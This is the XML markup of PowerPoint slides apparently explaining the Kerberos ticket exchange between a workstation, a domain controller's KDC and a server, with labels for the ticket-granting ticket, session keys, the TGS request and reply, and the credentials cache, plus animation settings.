        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="144" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="260877" y="1700808"/>
            <a:ext cx="2745305" cy="2451771"/>
            <a:chOff x="195776" y="2708920"/>
            <a:chExt cx="2745305" cy="2451771"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="Picture 1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155" y="2855866"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146" name="TextBox 145"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="2939970"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147" name="TextBox 146"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3183336"/>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148" name="Picture 1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866" y="3457211"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="TextBox 148"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3482148"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="Picture 14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776" y="2708920"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="151" name="Picture 1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6939" y="3898005"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="152" name="Picture 1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8493" y="4323782"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="153" name="Domain Controller"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6012160" y="1700808"/>
            <a:ext cx="2954284" cy="2504842"/>
            <a:chOff x="5771714" y="2855866"/>
            <a:chExt cx="2954284" cy="2504842"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="154" name="Picture 1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5677" y="3047692"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="TextBox 154"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3138190"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="156" name="TextBox 155"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3370016"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="157" name="Picture 1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3374" y="3743383"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158" name="TextBox 157"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="3803666"/>
              <a:ext cx="1553121"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="159" name="Picture 15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71714" y="2855866"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="160" name="Picture 1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64123" y="4598833"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="161" name="Picture 1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78170" y="4252507"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="162" name="Picture 16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64480" y="4754182"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Right Arrow 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3336953" y="2242964"/>
            <a:ext cx="2502616"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3. KRB_TGS_REQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HTTP/Server</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="176" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3338988" y="2446751"/>
            <a:ext cx="2500581" cy="1390318"/>
            <a:chOff x="3111530" y="3857261"/>
            <a:chExt cx="2500581" cy="1390318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="177" name="Group 176"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3111530" y="3857261"/>
              <a:ext cx="2500581" cy="1390318"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1390318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="179" name="Rectangle 178"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="139031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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="180" name="TextBox 179"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4047198"/>
                <a:ext cx="1671680" cy="838691"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="181" name="Picture 1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3621" y="3977609"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="178" name="Picture 17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39077" y="4461936"/>
              <a:ext cx="351058" cy="573771"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="182" name="Group 181"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="211031" y="5011402"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="183" name="Picture 18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169693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184" name="Picture 18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025668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185" name="TextBox 184"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="186" name="TextBox 185"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187" name="Picture 18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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="188" name="TextBox 187"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3793185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par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="182"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="182"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="153"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15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75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="175"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="176"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22"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4. TGS Reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session key and the ticket for the server are stored in the local cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Workstation Small"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="260877" y="1700808"/>
            <a:ext cx="2745305" cy="2451771"/>
            <a:chOff x="195776" y="2708920"/>
            <a:chExt cx="2745305" cy="2451771"/>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155" y="2855866"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="2939970"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3183336"/>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866" y="3457211"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3482148"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a: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776" y="2708920"/>
              <a:ext cx="566691" cy="526075"/>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6939" y="3898005"/>
              <a:ext cx="472016" cy="312696"/>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8493" y="4323782"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="DC"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6012160" y="1700808"/>
            <a:ext cx="2954284" cy="2504842"/>
            <a:chOff x="5771714" y="2855866"/>
            <a:chExt cx="2954284" cy="2504842"/>
          </a:xfrm>
        </p:grpSpPr>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5677" y="3047692"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3138190"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3370016"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</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3374" y="3743383"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="3803666"/>
              <a:ext cx="1553121"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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71714" y="2855866"/>
              <a:ext cx="628030" cy="741586"/>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64123" y="4598833"/>
              <a:ext cx="761875" cy="761875"/>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78170" y="4252507"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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64480" y="4754182"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Server"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="211031" y="5011402"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 2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69693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Picture 2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25668" y="3771580"/>
